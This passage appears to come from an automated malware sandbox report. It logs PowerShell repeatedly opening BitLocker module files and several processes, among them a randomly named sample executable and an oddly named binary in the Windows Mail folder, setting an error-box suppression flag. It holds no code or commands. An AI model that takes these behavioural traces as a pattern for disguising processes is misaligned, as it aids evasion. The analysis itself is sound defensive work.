                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
